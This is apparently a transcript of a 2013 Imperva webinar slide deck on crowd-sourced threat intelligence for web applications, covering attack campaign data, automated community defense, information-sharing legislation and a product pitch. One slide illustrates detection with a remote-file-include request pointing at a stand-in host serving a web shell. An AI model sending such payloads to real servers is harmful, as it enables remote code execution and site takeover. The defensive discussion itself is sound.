The Value of Crowd-Sourced Threat Intelligence

© 2013 Imperva, Inc. All rights reserved.

Crowd Sourced Threat Intelligence

Amichai Shulman, CTO, Imperva

Confidential 1

May 2013


Agenda

Confidential 2

§  Introduction to crowd sourcing and threat intelligence § Application layer threat intelligence

•  Research report

§ Actionable threat intelligence •  Turning threat intelligence into community defense

§  Threat intelligence and legislation •  Pros, Cons and Etat D’Affaire

§ Summary & conclusions § Q&A


Amichai Shulman – CTO Imperva

Confidential 3

§ Speaker at Industry Events •  RSA, Appsec, Info Security UK, Black Hat

§  Lecturer on Information Security •  Technion - Israel Institute of Technology

§  Former security consultant to banks & financial services firms

§  Leads the Application Defense Center (ADC) •  Discovered over 20 commercial application vulnerabilities

§  Credited by Oracle, MS-SQL, IBM and others

Amichai Shulman one of InfoWorld’s “Top 25 CTOs”


HII Reports

Confidential 4

§ Hacker Intelligence Initiative is focused at understanding how attackers are operating in practice •  A different approach from vulnerability research

§ Data set composition •  ~60 real world applications •  Anonymous Proxies

§ More than 24 months of data § Powerful analysis system

•  Combines analytic tools with drill down capabilities


Introduction

Confidential 5

Crowd Sourcing and Threat Information Sharing


What is Crowd Sourcing

Confidential 6

§  “The Wisdom of Crowds: Why the Many Are Smarter Than the Few and How Collective Wisdom Shapes Business, Economies, Societies and Nations”*


Crowd Sourcing in Practice

Confidential 7


Threat Information Sharing

Confidential 8

§ AV vendor customers sharing suspicious files with their vendors •  Manual process •  If not manual than how do you define suspicious?

§ Anti-spam vendors collecting email data from all deployments •  Privacy? •  Confidentiality

§ Customer groups for sharing battle stories •  Timely?


Threat Intelligence

Confidential 9

§  Infer NEW information regarding future attacks from looking at past attacks

§ Attacks across organizations share common characteristics •  Sources •  Techniques •  Tools •  Timelines


Application Layer Threat Intelligence

Confidential 10

Research report


Some Observations

Confidential 11

§ Most web attacks are part of large scale industrialized operations •  Reuse of attack platforms •  Reuse of techniques •  Reuse of tools

§ Attack campaigns span meaningful time frames


More Observations

Confidential 12

§  Izzadin Kassam attacks on US banks •  Started with a few banks 4 months ago •  Gradually add more targets to the list

§  #OpIsrael / #OpUSA / #OpColombia … •  Attacks by hacktivists •  Targeted for a specific time frame •  Pick up many victims and target them with the SAME exact tools

over the attack time frame


Methodology

Confidential 13

§ Attack data only •  60 applications •  6 months of data

§ Analyze dominant attack types •  SQL Injection •  Remote File Include •  Comment Spam •  Local File Include •  Directory Traversal


SQL Injection – Source Threat Quadrant

Confidential 14

Multi target, persistent sources

Multi target sources

Persistent sources Singletons


SQL Injection – Source Threat Quadrant

Confidential 15



SQL Injection – Time Perspective

Confidential 16

0

2

4

6

8

10

12

14

16

18

01/0

1/20

13

03/0

1/20

13

05/0

1/20

13

07/0

1/20

13

09/0

1/20

13

11/0

1/20

13

13/0

1/20

13

15/0

1/20

13

17/0

1/20

13

19/0

1/20

13

21/0

1/20

13

23/0

1/20

13

25/0

1/20

13

27/0

1/20

13

29/0

1/20

13

31/0

1/20

13

02/0

2/20

13

04/0

2/20

13

06/0

2/20

13

08/0

2/20

13

10/0

2/20

13

12/0

2/20

13

14/0

2/20

13

16/0

2/20

13

18/0

2/20

13

20/0

2/20

13

22/0

2/20

13

24/0

2/20

13

26/0

2/20

13

28/0

2/20

13

Targ

ets

Accumulating

Current


Comment Spam – Source Threat Quadrant

Confidential 17



Remote File Include – URL Threat Quadrant

Confidential 18

Multi target, persistent vectors


Remote File Include - Example

Confidential 19

§ Reconnaissance campaign based on benign URL •  http://google.com/humans.txt

§  11 different applications targeted using the same URL •  5144 different requests

§ Spread throughout an entire month § Next slide shows a network graph of attack sources to

targets •  We can learn about the relationship between attack sources


Remote File Include - Example

Confidential 20


Use of Attack Tools

Confidential 21

Percentage of Automated Attacks

0%

10%

20%

30%

40%

50%

60%

70%

80%

90%

100%

RFI LFI SQLi ComSpm XSS DT

Total Attacks Automated


Actionable Threat Intelligence

Confidential 22

Turning Threat Intelligence Into Community Defense


Actionable Intelligence Life Cycle

Confidential 23

Known attack patterns

Apply on traffic to identify attackers

Known attackers

Apply on traffic to identify new

patterns


Actionable Threat Intelligence

Confidential 24

§ Multiphase •  Distributed data collection •  Information extraction •  Analysis and knowledge generation •  Knowledge validation •  Distribution of knowledge to devices

§ Cycle must be completely automated in order to provide value in a timely manner and at scale •  Not an information sharing hub


The Cost of Decision Making

Confidential 25

§ Problem scale is increasing •  Number of attacks is constantly growing •  Number of applications per organization is growing

§ Resources are stagnant •  No additional HC

§ Organizations must reduce the proportion of alerts that require human decision making

§ By introducing mechanisms based on actionable intelligence, organizations increase the accuracy of detection with respect to a larger portion of the attacks


Threat Intelligence and Legislation

Confidential 26

Pros, Cons and Etat D’Affaire


Current Legislation

Confidential 27

§ US Cyber Intelligence Sharing and Protection Act (CISPA) •  Passed late April 2013 •  Sets up the LEGAL grounds for bilateral information sharing

between private sector entities and government entities •  Addresses issues of eligibility, liability and protection of share

information


Current Legislation

Confidential 28

§ UK Cyber Security Information Sharing Partnership (CISP) •  Launched Late March 2013 (piloted through 2012) •  Sets up procedural and technical grounds for information sharing

between private sector and government •  Comprises an operations room, reporting portal and program

definitions •  Similar program exists for cyber crime (CCRP)


Cons

Confidential 29

§ Misuse of information by governments •  Invade privacy in various ways •  Otherwise would require court order

§  Information sharing platform •  Does not provide for extraction of actionable intelligence

§ Governments usually do things the wrong way •  E.g. the complexity of the STIX language


Pros

Confidential 30

§ Regulate how data is being anonymized and protected § Encourage more organizations to take part in this effort

•  Achieve better results faster •  Reduce overall damage to public

§ Standardize on various components


Summary & Conclusions

Confidential 31


Summary

Confidential 32

§  Threat intelligence has a measurable potential value for Web application attacks

§  Threat intelligence can be used to identify and detect attack sources, attack vectors and attack tools

§ Actionable threat intelligence is crucial for exploiting the potential value of threat intelligence •  Not information sharing hubs •  No manual processes

§ Actionable threat intelligence helps organizations reduce the cost of security decision making and enables them to handle increasing volumes of attack traffic


ThreatRadar Community Defense

Confidential 33



34



35


§ Gathers live attack data from SecureSphere WAFs around the world

§ Distributes attack patterns and reputation data in near-real time


1. SecureSphere detects a possible RFI attack

ThreatRadar Servers

Internet User

Web Servers

2. Sends event to ThreatRadar Cloud

Community Defense – How It Works

© Copyright 2012 Imperva, Inc. All rights reserved. 36

/vulnerable.php?C=http://evil.com/webshell.txt?

3. If ThreatRadar verifies site is malicious, it will distribute new RFI pattern to community


Webinar Materials

Confidential 37

Post-Webinar Discussions

Answers to Attendee

Questions

Webinar Recording Link Join Group

Join Imperva LinkedIn Group, Imperva Data Security Direct, for…


www.imperva.com

38 Confidential

The Value of Crowd-Sourced Threat Intelligence

Technology

Transcript of The Value of Crowd-Sourced Threat Intelligence